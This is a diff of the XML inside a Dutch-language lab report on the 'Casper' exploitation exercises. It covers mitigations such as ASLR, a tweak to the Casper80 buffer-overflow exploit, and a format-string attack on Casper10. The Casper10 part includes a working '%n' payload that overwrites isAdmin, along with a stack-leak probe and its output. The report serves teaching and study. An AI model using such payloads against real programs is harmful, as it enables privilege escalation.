+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Een derde </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>mitigatie is d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">oor gebruik te maken van ASLR, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Address</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Space </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Layout</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Randomization</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>. Dit maakt het moeilijker om het correcte adres te specifiëren van de shell code.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Een vierde manier door de environment variabelen te cleanen in het programma. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Maar dit werkt niet in alle gevallen van een return </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>to</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>libc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> attack. De aanvaller kan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>/bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>xh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in de buffer schrijven en hiernaar verwijzen in plaats van naar een environment variabele.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop2"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Advanced level: Casper</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
         <w:t>8</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop3"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>Omschrijving</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop3"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>Vulnerability</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop3"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Exploit </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>beschrijving</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop3"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>Mitigation</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop2"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>Advanced level: Casper</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>81</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>0</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Casper80 gaat bijkomend </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">de data in de buffer nakijken naar NOP operaties. Aangezien ik geen van deze operaties gebruik in de buffer kan de vorige exploit gebruikt worden. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>De enigste aanpassing die dient gemaakt te worden i</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>s het aantal karakters die geschreven moeten worden.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Er moeten 4 bytes meer geschreven worden in de buffer om het return adres correct te overschrijven.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Dit heb ik gedaan door 4 keer het karakter “D” vooraan toe te voegen.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:br w:type="page"/>
       </w:r>
@@ -4524,8 +5668,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Kop1"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -4534,87 +5679,737 @@
       </w:r>
       <w:r>
         <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>10</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop3"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Omschrijving</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Dit programma is verschillend van alle vo</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>orgaande</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>casper</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>programmas</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Allereerst wordt er nagekeken of er een parameter meegegeven wordt. Indien dit niet het geval is gaat het een error bericht: “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Usage</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>: /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>casper</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/casper8 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>YourName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>” teruggeven. Vervolgens stopt het programma met een errorcode 1.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Indien er wel een parameter meegegeven wordt gaat de “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>greetUser</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">” functie opgeroepen worden met de meegegeven input. Deze functie maakt een buffer aan van 999 karakters en gaat vervolgens </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>gebruik maken van een string format functie “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>sprintf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>”. Deze functie print in een string. Het gaat de meegegeven string s printen in de “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Hello</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> %s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">!\n” format naar de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>buf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> variabele.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Vervolgens wordt er onveilig gebruik gemaakt van de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>printf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> functie.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t>10</w:t>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>gdb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>) p &amp;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>isAdmin</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>$1 = (int *) 0x8049938 &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>isAdmin</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Kop3"/>
-        <w:rPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
           <w:lang w:val="en-GB"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t>Omschrijving</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-      </w:pPr>
+        <w:t>casper</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>/casper10 $(python -c 'print "D" + "\x38\x99\x04\x08" + "%x"*6 + "%n"')</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Kop3"/>
-        <w:rPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
           <w:lang w:val="en-GB"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop3"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="en-GB"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
         <w:t>Vulnerability</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Casper10 heeft een format-string </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>vulnerability</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> dat een data-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>only</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> attack kan veroorz</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">aken. Zowel stack </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>canaries</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> als </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>een niet uitvoerbare</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> stack zijn ingeschakeld.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Kop3"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Exploit </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>beschrijving</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Exploit beschrijving</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Om deze exploit te vinden ben ik begonnen door het programma te laten crashen. Dit heb ik gedaan door middel van de volgende code: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>casper</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/casper10 AAAA$(python -c 'print ".%08x"*15') </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Deze code gaat 4 maal een “A” printen gevolgd door 15 maal “.%08x”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Dit geeft de volgende uitvoer: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>HelloAAAA.080486d0.bffff7d1.bffff7d1.001b023c.6c654808.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:u w:val="single"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>41</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>206f6c.2e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:u w:val="single"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>414141</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78!</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Deze code laat een deel van de stack memory zien. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Het werkt omdat de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>printf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-functie 15 keer </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>4 bytes</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> van de stack opvraagt en deze </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>elk toont als een hexadecimaal getal dat bestaat uit 8 cijfers.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Dit geeft de bovenstaande output.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Door dit te doen kunnen we een deel van de stack reconstrueren.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">We zien waar de “AAAA” string </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>zich</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in memory</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> bevind</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
